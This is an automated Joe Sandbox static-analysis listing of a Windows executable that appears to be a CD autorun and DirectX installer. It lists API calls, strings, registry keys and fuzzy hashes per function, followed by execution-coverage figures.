                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterSection__lock
                                                                                                                        • String ID: @bE$@bE$LmE
                                                                                                                        • API String ID: 238394327-2432022147
                                                                                                                        • Opcode ID: a7362febf858d49887ac4fd0a0a794e3c4a9f89c7bf4e2645289f9b2683df8dd
                                                                                                                        • Instruction ID: e40cd25d26dbb6555db724202a02cf2ae53cf0c6892a069b9dabf880c229dd93
                                                                                                                        • Opcode Fuzzy Hash: a7362febf858d49887ac4fd0a0a794e3c4a9f89c7bf4e2645289f9b2683df8dd
                                                                                                                        • Instruction Fuzzy Hash: A541FBB1B117218FC7A0DF69E88065EB7F0BB08314792492FE959D7751DB78A881CF09
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • RegOpenKeyExA.ADVAPI32 ref: 0041653A
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,00000100), ref: 00416562
                                                                                                                        Strings
                                                                                                                        • Version, xrefs: 00416554
                                                                                                                        • SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}, xrefs: 00416525
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$AddressLibraryLoadOpenPathProcQuerySystemTempValueWindows
                                                                                                                        • String ID: SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}$Version
                                                                                                                        • API String ID: 3927907489-1332029265
                                                                                                                        • Opcode ID: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                        • Instruction ID: 2c3280e8fd186b36745d7fe58343f886ef13101444831185cebde92ec6972ae0
                                                                                                                        • Opcode Fuzzy Hash: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                        • Instruction Fuzzy Hash: 5E21F371148341AFD314CF14C851BEBB7E8FB99744F104A1DF5A9832D0EB78A548CB56
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00414EF1
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414F00
                                                                                                                        • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414F0E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseDirectoryFileNextRemove
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2004183241-1173974218
                                                                                                                        • Opcode ID: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                        • Instruction ID: 9c89db226a464595a1456a08dba5ac67963ce04dc153f15b353361ca2e9a56d0
                                                                                                                        • Opcode Fuzzy Hash: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                        • Instruction Fuzzy Hash: F711EB751087828BC721CB28A8547EBFBD9FFD6306F144929EDC587301DB35A889C755
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00416B9A
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00416BB6
                                                                                                                        • MessageBoxA.USER32(00000000,?,DirectX Error,00000000), ref: 00416BCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorFormatLast
                                                                                                                        • String ID: DirectX Error
                                                                                                                        • API String ID: 3971115935-1449601957
                                                                                                                        • Opcode ID: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                        • Instruction ID: 00734949432f92e12728b15547f2c9266f1449dcf60645d6a7a156eb7abf3a75
                                                                                                                        • Opcode Fuzzy Hash: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                        • Instruction Fuzzy Hash: 9F018071304310ABE710DFA59C49F6B77ACEF86B15F11852DFA00CA280D674E8008669
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00424B26), ref: 0042C2D9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042C2E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                        • Opcode ID: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                        • Instruction ID: 3010c939291e915eff1eb01b3b571670853061f70a44e764dbecd71da3a81d10
                                                                                                                        • Opcode Fuzzy Hash: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                        • Instruction Fuzzy Hash: C2F01D30F40A1DD2DB001BE0BD4A26FBB78BB92746F9105E1D891A0094DF7884B4C25E
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,0044EAE0,00000010,004297E9,00000000,00000FA0,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00431821
                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00431831
                                                                                                                        Strings
                                                                                                                        • kernel32.dll, xrefs: 0043181C
                                                                                                                        • InitializeCriticalSectionAndSpinCount, xrefs: 0043182B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                        • API String ID: 1646373207-3733552308
                                                                                                                        • Opcode ID: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
                                                                                                                        • Instruction ID: 4a45933a82aeb79599459cbe0f8cef8bbb669c532bc06b3cb3151a140fe0d406
                                                                                                                        • Opcode Fuzzy Hash: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
                                                                                                                        • Instruction Fuzzy Hash: 32F09A70640306AADB54AFA69C0679E3AA0BB08349F20983EE411E52B0DFBCC5108B1D
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000400,?), ref: 004312F8
                                                                                                                        • GetLastError.KERNEL32 ref: 00431302
                                                                                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 004313CB
                                                                                                                        • GetLastError.KERNEL32 ref: 004313D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1948546556-0
                                                                                                                        • Opcode ID: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                        • Instruction ID: 191bc55e6a285dc79099745201b46e499ca68c129fd5b025dbec7fdafe6e4a6e
                                                                                                                        • Opcode Fuzzy Hash: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                        • Instruction Fuzzy Hash: 6F61D930604385DFDB21CF58C884B9A7BF4BF1A304F14559BE8618B3A2D778D946CB1A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00408060: VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                          • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                          • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                        • Sleep.KERNEL32(00000001), ref: 004016EA
                                                                                                                        • Sleep.KERNEL32(00000001), ref: 004017C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$FreeHeapProtectVirtual__lock
                                                                                                                        • String ID: DXInstalled = %d$InstallDirectXIfRequired
                                                                                                                        • API String ID: 715370876-4124889539
                                                                                                                        • Opcode ID: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                        • Instruction ID: 364755a666ca341e749ee64d0003a40c6949535c43a42a4e9d33c4ab1bb0a936
                                                                                                                        • Opcode Fuzzy Hash: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                        • Instruction Fuzzy Hash: E851C4716487006BD300EB94FC42FAB3BA9AB85706F04847EFD44A72D3DA79D5048B6E
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0042C8FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                        • Instruction ID: 8280d1e270eca7936ff5276bf182434933e20333d3727ff594148b0d188492fc
                                                                                                                        • Opcode Fuzzy Hash: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                        • Instruction Fuzzy Hash: 48517FB1A04268DFDB22DFA9EC80BEDBBB8FF46304F50411AE8559B252DB345A41CF15
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00428705
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        • __lock.LIBCMT ref: 00428751
                                                                                                                        • EnterCriticalSection.KERNEL32(0000008C,0044CD58,00000014,00432A14,?,?,00000000), ref: 0042879B
                                                                                                                        • LeaveCriticalSection.KERNEL32(0000008C), ref: 004287A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Enter__lock$Leave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 885841014-0
                                                                                                                        • Opcode ID: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                        • Instruction ID: b3503f7208acb3f95ac1f212b98e40c77cfa49c85add1a9a95d8a4e58ead19da
                                                                                                                        • Opcode Fuzzy Hash: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                        • Instruction Fuzzy Hash: 98411771A023228AD710AF65EC4576E7BA0AF41324FA4862FD121962D1DF7C9541CB1C
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,?,?), ref: 00417386
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 004173B1
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 004173C1
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004173CE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4142876296-0
                                                                                                                        • Opcode ID: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                        • Instruction ID: 816ecf25c106d77b39d132cd8e82fa92df93f4f8198aa37a08063b162ff1abf5
                                                                                                                        • Opcode Fuzzy Hash: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                        • Instruction Fuzzy Hash: EA016DB6204201AFE320CB54DC49FEBB7ACEB89B04F00852DBA95D2151D6749804CBA6
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___addl
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2260456530-0
                                                                                                                        • Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                        • Instruction ID: 9a3622a891a97d8ac40710fbd079e3f9d72052691bd83aec0a43e73614e04fb6
                                                                                                                        • Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                        • Instruction Fuzzy Hash: CAF0F032400606BFCB225F02DC01EA3B7EDFF19301F04142AFD698A131E722EA69CB51
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: %c:\$common_filelist.txt
                                                                                                                        • API String ID: 1611563598-3546436211
                                                                                                                        • Opcode ID: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                        • Instruction ID: 075e01302480f862047a0cd229708d3c32eb167a873184b3eb99f0da593a5d69
                                                                                                                        • Opcode Fuzzy Hash: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                        • Instruction Fuzzy Hash: 2E815FB16043406AD320EB659C41FFB77D89F85304F44482FFA8593292EB7CD949CB6A
                                                                                                                        APIs
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 0040F3C8
                                                                                                                        Strings
                                                                                                                        • No Languages Selected!, xrefs: 0040F3B5
                                                                                                                        • Corrupted AutoRun.CFG File, xrefs: 0040F3B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DefaultLangUser
                                                                                                                        • String ID: Corrupted AutoRun.CFG File$No Languages Selected!
                                                                                                                        • API String ID: 768647712-574851024
                                                                                                                        • Opcode ID: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                        • Instruction ID: 53668502b466ec9360e6261e60baa1c822bb85f3723ac8f7f48d7bf6175b14eb
                                                                                                                        • Opcode Fuzzy Hash: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                        • Instruction Fuzzy Hash: BA4104319047525BC736CB3C8444267FB91AF96314F0982BBDC94ABB92C334A94EC784
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: %c:\$common_filelist.txt
                                                                                                                        • API String ID: 1611563598-3546436211
                                                                                                                        • Opcode ID: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                        • Instruction ID: 6025519ab524a28bed39fbe42f5c2c1978188ea60c5d789c7bac0d9d67ab69ce
                                                                                                                        • Opcode Fuzzy Hash: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                        • Instruction Fuzzy Hash: A6412BB15043446AD320EBA09C41FEB77989F85705F44481FFB44562C2FBBCE645CB6A
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __getbuf
                                                                                                                        • String ID: hE$@hE
                                                                                                                        • API String ID: 554500569-3527237109
                                                                                                                        • Opcode ID: 2d09c157eed4a3bd63498b0e5f70137e9fd5757940b0b5303955637cf367db83
                                                                                                                        • Instruction ID: f17e0a6b82f98ebd52715b5456d606124dd6aad15095f93feb889772c3e2a4ef
                                                                                                                        • Opcode Fuzzy Hash: 2d09c157eed4a3bd63498b0e5f70137e9fd5757940b0b5303955637cf367db83
                                                                                                                        • Instruction Fuzzy Hash: 3731A271600710AFC7308F19D841B6677A4EF51329F54C92FE8AA8B291D73CE984CB88
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 0040F818
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 626452242-3916222277
                                                                                                                        • Opcode ID: 84796c686fa8f72b5e6dfbd94a193fb8d16dbb584841e412bd2790552e76208a
                                                                                                                        • Instruction ID: df888b1d167fcae8043a8df2e68d74cec1358aa0cf7ec91854029ad9e172171b
                                                                                                                        • Opcode Fuzzy Hash: 84796c686fa8f72b5e6dfbd94a193fb8d16dbb584841e412bd2790552e76208a
                                                                                                                        • Instruction Fuzzy Hash: C0216BB610435166E330A724DC42BEB72F4EBC4751F10853EF6D69A1D0E7785449C39B
                                                                                                                        APIs
                                                                                                                        • GetClassInfoA.USER32(?,-0000007C,?), ref: 004384AF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassInfo
                                                                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                        • API String ID: 3534257612-2801496823
                                                                                                                        • Opcode ID: dbe3cc86fff193af0684558f81ef42c515353e085cb2aed473aa4667f0f1f147
                                                                                                                        • Instruction ID: b8301b33258d6b108bdec7fe8fd4c628fef138bfb49540b2024fb64cfbea2f2c
                                                                                                                        • Opcode Fuzzy Hash: dbe3cc86fff193af0684558f81ef42c515353e085cb2aed473aa4667f0f1f147
                                                                                                                        • Instruction Fuzzy Hash: 2721307190020AAF9B10EFA5D8419DFBBB8EE59354F00402FF904E3201E7789951CBA9
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0040F5D8
                                                                                                                        • GetVolumeInformationA.KERNEL32 ref: 0040F608
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorInformationLastVolume
                                                                                                                        • String ID: CDFS
                                                                                                                        • API String ID: 2466915109-2335696158
                                                                                                                        • Opcode ID: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                        • Instruction ID: 0ba698df5349420569fcb0b07cbe6f9900faa6667f1b351f96fad5a35dfb1ad2
                                                                                                                        • Opcode Fuzzy Hash: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                        • Instruction Fuzzy Hash: EC1127766042016BE711CB58DC05BD7BBE4ABD5300F04C87DF58457181EAB4994DC763
                                                                                                                        APIs
                                                                                                                        • RegCloseKey.ADVAPI32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041752A
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041754B
                                                                                                                        Strings
                                                                                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00417520
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen
                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                        • API String ID: 47109696-1023437679
                                                                                                                        • Opcode ID: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                        • Instruction ID: 0f0fbff194b733e9befad18985cc3632bf2348863539eaefa16bfffbd4cac233
                                                                                                                        • Opcode Fuzzy Hash: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                        • Instruction Fuzzy Hash: 78E0EC75504310AFD370DF58EC49F87BBE8EF4A750F01881EB889D3250D6749840CBA5
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0042C78D
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        • EnterCriticalSection.KERNEL32(00000020,004252A6,?,0044C9A0,0000000C,0041AB0C,00000000,?,?,00446A11,004044BD), ref: 0042C798
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterSection$__lock
                                                                                                                        • String ID: `jE
                                                                                                                        • API String ID: 3410214836-775037952
                                                                                                                        • Opcode ID: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                        • Instruction ID: e25f03711a34877e1c848d10ee6b2a6bf970461377bf0363c61bc6c07be673b1
                                                                                                                        • Opcode Fuzzy Hash: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                        • Instruction Fuzzy Hash: 9BD022B6B0010203DF282676EEC950E3208D2823037EA8C3BF802C3282CF2CDD80840D
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443862
                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443874
                                                                                                                        • LeaveCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 0044387D
                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D), ref: 0044388F
                                                                                                                          • Part of subcall function 004437CB: InitializeCriticalSection.KERNEL32(00480774,00443842,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D,?,0047EA90), ref: 004437E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 713024617-0
                                                                                                                        • Opcode ID: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                        • Instruction ID: 3b45dfc569fa32815649505fb739a58a282b546805a0b9d948b316ba2df3f3b5
                                                                                                                        • Opcode Fuzzy Hash: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                        • Instruction Fuzzy Hash: 82F06D7101020ADFE750AF94EC84A5AF3ACFB15716F00083BE14083011D738F658CBA8

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:17
                                                                                                                        Total number of Limit Nodes:2
